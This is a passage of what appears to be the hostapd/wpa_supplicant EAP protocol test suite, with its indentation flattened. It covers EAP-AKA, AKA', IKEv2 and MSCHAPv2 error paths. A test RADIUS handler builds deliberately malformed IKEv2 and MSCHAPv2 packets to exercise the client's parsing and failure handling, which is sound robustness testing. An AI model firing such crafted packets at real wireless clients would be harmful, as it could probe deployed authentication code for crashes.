dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_aka_learn_ids"),
(2, "=eap_aka_learn_ids"),
(1, "eap_sim_parse_encr;eap_aka_process_challenge"),
(1, "wpabuf_dup;eap_aka_add_id_msg"),
(1, "wpabuf_resize;eap_aka_add_id_msg"),
(1, "eap_aka_getKey"),
(1, "eap_aka_get_emsk"),
(1, "eap_aka_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000@domain",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
params = int_eap_server_params()
params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
params['eap_sim_aka_result_ind'] = "1"
hostapd.add_ap(apdev[1], params)
with alloc_fail(dev[0], 1,
"eap_sim_msg_init;eap_aka_response_notification"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_msg_add_encr_start;eap_aka_response_notification",
"aes_128_cbc_encrypt;eap_aka_response_notification" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_parse_encr;eap_aka_process_notification_reauth" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_prime_errors(dev, apdev):
"""EAP-AKA' protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_aka_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_aka_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac_sha256"),
(1, "=eap_aka_process_challenge") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_ikev2(dev, apdev):
"""EAP-IKEv2 protocol tests"""
check_eap_capa(dev[0], "IKEV2")
global eap_proto_ikev2_test_done
eap_proto_ikev2_test_done = False
def ikev2_handler(ctx, req):
logger.info("ikev2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_IKEV2, 0x80, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Message Length value")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0x80, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(2)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(3)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(4)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 10000000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (first fragment)")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (second fragment)")
return struct.pack(">BBHBB2B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_IKEV2, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in first fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_IKEV2, 0x40, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: ICV before keys")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported IKEv2 header version")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect IKEv2 header Length")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Exchange Type in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Message ID in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 1, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value(2)")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x20, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No SAi1 in SA_INIT")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x08, 0, 28)
def build_ike(id, next=0, exch_type=34, flags=0x00, ike=''):
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, id,
4 + 1 + 1 + 28 + len(ike),
EAP_TYPE_IKEV2, flags,
0, 0, 0, 0,
next, 0x20, exch_type, 0x08, 0,
28 + len(ike)) + ike
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected extra data after payloads")
return build_ike(ctx['id'], ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated payload header")
return build_ike(ctx['id'], next=128, ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small payload header length")
ike = struct.pack(">BBH", 0, 0, 3)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large payload header length")
ike = struct.pack(">BBH", 0, 0, 5)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported payload (non-critical and critical)")
ike = struct.pack(">BBHBBH", 129, 0, 4, 0, 0x01, 4)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Certificate and empty SAi1")
ike = struct.pack(">BBHBBH", 33, 0, 4, 0, 0, 4)
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short proposal")
ike = struct.pack(">BBHBBHBBB", 0, 0, 4 + 7,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 7, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 9, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal type in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
1, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Protocol ID in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal number in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Not enough room for SPI in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 1, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SPI in SAi1")
ike = struct.pack(">BBHBBHBBBBB", 0, 0, 4 + 9,
0, 0, 9, 1, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transforms in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short transform in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 9, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Transform type in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
1, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attributes in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attr for AES and unexpected data after transforms in SAi1")
tlen1 = 8 + 3
tlen2 = 8 + 4
tlen3 = 8 + 4
tlen = tlen1 + tlen2 + tlen3
ike = struct.pack(">BBHBBHBBBBBBHBBH3BBBHBBHHHBBHBBHHHB",
0, 0, 4 + 8 + tlen + 1,
0, 0, 8 + tlen + 1, 1, 1, 0, 3,
3, 0, tlen1, 1, 0, 12, 1, 2, 3,
3, 0, tlen2, 1, 0, 12, 0, 128,
0, 0, tlen3, 1, 0, 12, 0x8000 | 14, 127,
1)
return build_ike(ctx['id'], next=33, ike=ike)
def build_sa(next=0):
tlen = 5 * 8
return struct.pack(">BBHBBHBBBBBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
next, 0, 4 + 8 + tlen,
0, 0, 8 + tlen, 1, 1, 0, 5,
3, 0, 8, 1, 0, 3,
3, 0, 8, 2, 0, 1,
3, 0, 8, 3, 0, 1,
3, 0, 8, 4, 0, 5,
0, 0, 8, 241, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, but no KEi in SAi1")
ike = build_sa()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Empty KEi in SAi1")
ike = build_sa(next=34) + struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Mismatch in DH Group in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 12345, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid DH public value length in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 5, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
def build_ke(next=0):
ke = struct.pack(">BBHHH", next, 0, 4 + 4 + 192, 5, 0)
ke += 191*'\x00'+'\x02'
return ke
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal and KEi, but no Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4 + 257) + 257*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
def build_ni(next=0):
return struct.pack(">BBH", next, 0, 4 + 256) + 256*'\x00'
def build_sai1(id):
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += build_ni()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: No integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated integrity checksum")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, flags=0x20, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("No more test responses available - test case completed")
global eap_proto_ikev2_test_done
eap_proto_ikev2_test_done = True
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(ikev2_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_ikev2_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="user",
password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP method start")
if i in [ 41, 46 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[2].dump_monitor()
finally:
stop_radius_server(srv)
def NtPasswordHash(password):
pw = password.encode('utf_16_le')
return hashlib.new('md4', pw).digest()
def HashNtPasswordHash(password_hash):
return hashlib.new('md4', password_hash).digest()
def ChallengeHash(peer_challenge, auth_challenge, username):
data = peer_challenge + auth_challenge + username
return hashlib.sha1(data).digest()[0:8]
def GenerateAuthenticatorResponse(password, nt_response, peer_challenge,
auth_challenge, username):
magic1 = binascii.unhexlify("4D616769632073657276657220746F20636C69656E74207369676E696E6720636F6E7374616E74")
magic2 = binascii.unhexlify("50616420746F206D616B6520697420646F206D6F7265207468616E206F6E6520697465726174696F6E")
password_hash = NtPasswordHash(password)
password_hash_hash = HashNtPasswordHash(password_hash)
data = password_hash_hash + nt_response + magic1
digest = hashlib.sha1(data).digest()
challenge = ChallengeHash(peer_challenge, auth_challenge, username)
data = digest + challenge + magic2
resp = hashlib.sha1(data).digest()
return resp
def test_eap_proto_ikev2_errors(dev, apdev):
"""EAP-IKEv2 local error cases"""
check_eap_capa(dev[0], "IKEV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_ikev2_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "ikev2_encr_encrypt"),
(1, "ikev2_encr_decrypt"),
(1, "ikev2_derive_auth_data"),
(2, "ikev2_derive_auth_data"),
(1, "=ikev2_decrypt_payload"),
(1, "ikev2_encr_decrypt;ikev2_decrypt_payload"),
(1, "ikev2_encr_encrypt;ikev2_build_encrypted"),
(1, "ikev2_derive_sk_keys"),
(2, "ikev2_derive_sk_keys"),
(3, "ikev2_derive_sk_keys"),
(4, "ikev2_derive_sk_keys"),
(5, "ikev2_derive_sk_keys"),
(6, "ikev2_derive_sk_keys"),
(7, "ikev2_derive_sk_keys"),
(8, "ikev2_derive_sk_keys"),
(1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
(1, "eap_msg_alloc;eap_ikev2_build_msg"),
(1, "eap_ikev2_getKey"),
(1, "eap_ikev2_get_emsk"),
(1, "eap_ikev2_get_session_id"),
(1, "=ikev2_derive_keys"),
(2, "=ikev2_derive_keys"),
(1, "wpabuf_alloc;ikev2_process_kei"),
(1, "=ikev2_process_idi"),
(1, "ikev2_derive_auth_data;ikev2_build_auth"),
(1, "wpabuf_alloc;ikev2_build_sa_init"),
(2, "wpabuf_alloc;ikev2_build_sa_init"),
(3, "wpabuf_alloc;ikev2_build_sa_init"),
(4, "wpabuf_alloc;ikev2_build_sa_init"),
(5, "wpabuf_alloc;ikev2_build_sa_init"),
(6, "wpabuf_alloc;ikev2_build_sa_init"),
(1, "wpabuf_alloc;ikev2_build_sa_auth"),
(2, "wpabuf_alloc;ikev2_build_sa_auth"),
(1, "ikev2_build_auth;ikev2_build_sa_auth") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user@domain",
password="ike password", erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "wpabuf_alloc;ikev2_build_notify"),
(2, "wpabuf_alloc;ikev2_build_notify"),
(1, "ikev2_build_encrypted;ikev2_build_notify") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="wrong password", erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "ikev2_integ_hash"),
(1, "ikev2_integ_hash;ikev2_decrypt_payload"),
(1, "os_get_random;ikev2_build_encrypted"),
(1, "ikev2_prf_plus;ikev2_derive_sk_keys"),
(1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
(1, "os_get_random;ikev2_build_sa_init"),
(2, "os_get_random;ikev2_build_sa_init"),
(1, "ikev2_integ_hash;eap_ikev2_validate_icv"),
(1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_keys"),
(1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
(2, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
(3, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
"rsn_pairwise": "CCMP", "ieee8021x": "1",
"eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
"fragment_size": "50" }
hostapd.add_ap(apdev[1], params)
tests = [ (1, "eap_ikev2_build_frag_ack"),
(1, "wpabuf_alloc;eap_ikev2_process_fragment") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_mschapv2(dev, apdev):
"""EAP-MSCHAPv2 protocol tests"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MSCHAPV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
0, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ms_len and unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
255, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success before challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
